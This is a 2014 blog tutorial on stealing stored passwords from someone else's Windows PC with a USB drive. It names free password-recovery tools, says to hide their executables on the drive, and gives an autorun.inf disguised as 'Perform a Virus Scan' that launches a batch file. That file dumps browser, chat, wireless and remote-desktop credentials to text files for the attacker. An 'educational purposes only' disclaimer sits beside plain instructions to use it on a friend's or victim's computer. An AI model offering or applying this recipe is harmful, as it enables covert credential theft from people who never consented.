Breaking News

Monday, April 14, 2014

How to steal passwords using Pen Drives/Flash Drives

Nowadays each and every website you visit, whether it may be mail clients like Gmail, Yahoo or Social Networking Site like Facebook, LinkedIn or wherever it may be you will find authentication/login systems.

I am not encouraging hacking or stealing of passwords. This is for educational purposes only. This is made available so that internet users understand how they can be hacked using pen drive. Please do not try to misuse for UN-ethical purposes.




Now each and every website has their own conditions of having usernames and passwords. Some uses their email id as user name, some uses any user defined value as their usernames, etc…


I agree security is important but then it is very difficult to remember usernames and passwords of so many websites. So here browsers comes to a rescue. Instead of Every time entering the user id and password, you can make browser remember your user id and password so that next time when you access the website it will automatically show up the user id and password and then without any trouble the user will be able to log in to the account.

Not only the browsers but also authentication is required in chat clients liked Gtalk, Yahoo Messenger, MSN Messenger, etc… Again remember password option is available in all such client for your rescue of not making you remember user id and passwords.

And many more such clients and applications we use in day to day has save user id and password option, which generally user enables it so as to avoid remembering so many passwords. Since the passwords are stored, there in can be hacked using some application resulting into information security breach.

Let us see how we can steal passwords using Pen drive/ Flash Drive

First of all we will need some tools which are available on Internet for free to steal the passwords.

1.      For Stealing Passwords of Browsers -  To download click here
PasswordFox, ChromePass, Opera Cache View, etc…
Using browser password tools we can steal all the passwords which are stored in the browser of the victims Computer. This will steal all the User Id and Passwords and the respective URL’s on which the user ID and Password has been used. Also the package contains such tools which can result you in stealing the cache and browsing history of the browsers available on the victim’s computer.

2.      For stealing System information – To download click here
This system Information package can help you to get the Product key of the licensed software’s like Windows, Office, Exchange Server, etc. It also contains such tools which can result in the information of the current USB device and also previously used USB devices. Also you can have a look at the process activity of the victim’s computer which can be used for creating backdoors and social engineering.

3.      For stealing Passwords of chat clients – To download click here
This tool package can be used to steal passwords of chat clients like Gtalk, Live Messenger, Dial Up passwords, router passwords, Passwords for .Pst file, which are nothing but the mail storing files of Outlook. Passwords of Wireless devices stored and also Remote desktop passwords if stored.

I have mentioned some of the most important one in the above posts, you can visit http://www.nirsoft.net/ to get such password stealing toolkits as per your requirements. You will find password toolkit of almost all the password storing clients or applications available in windows.

Now this toolkit is available to ethical use. I.e. it is used whenever we forget out passwords what we have stored in the clients but this tool can be used unethically in victims’ pc to get the passwords which are stored in his pc.

 Usage of the above tools to steal passwords

1.      First of all download the tools which ever you want. I.e. if you want to steal password of browser you can use browser tools and similarly as per your requirement.

2.      Copy all the executable, i.e. (.exe) in the root location of the pen drive.




You can even select all the exe files and hide it, so that when inserted in to victims PC, he doesn’t trace out any application being available in the pen drive.

3.      Now create a blank notepad file in the pen drive and type in the below command in the notepad file.

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

4.      Now save the notepad file as Autorun.inf.
                     



5.   Now create another notepad file and whatever tools you have copied to the pen drive i.e. (.exe) for every exe file type in commands similar to this below

Start “.exe file name” /stext “txt file name

E.g. if PasswordFox is the .exe file then it will be start passwordfox.exe /stext passwordfox.txt


Similarly for each tool this line has to be added in the text file.





6.  Once all the lines have been added save the file as launch.bat

Now your toolkit for stealing the password is ready. All you have to do is to insert in to friends PC and start stealing the passwords.


7.  Now when you insert this pen drive in to any computer an autorun will pop up asking you to perform an antivirus scan.


8.  As soon as you click on it. The script gets executed and all the passwords whatever is stored on the victims’ PC gets stored in the text file mentioned in the launch.bat command.


Here goes the password of the victim in the Pen drive as a text file.





 
Now just open the txt file which has the stored user id and passwords and enjoy!


Designed By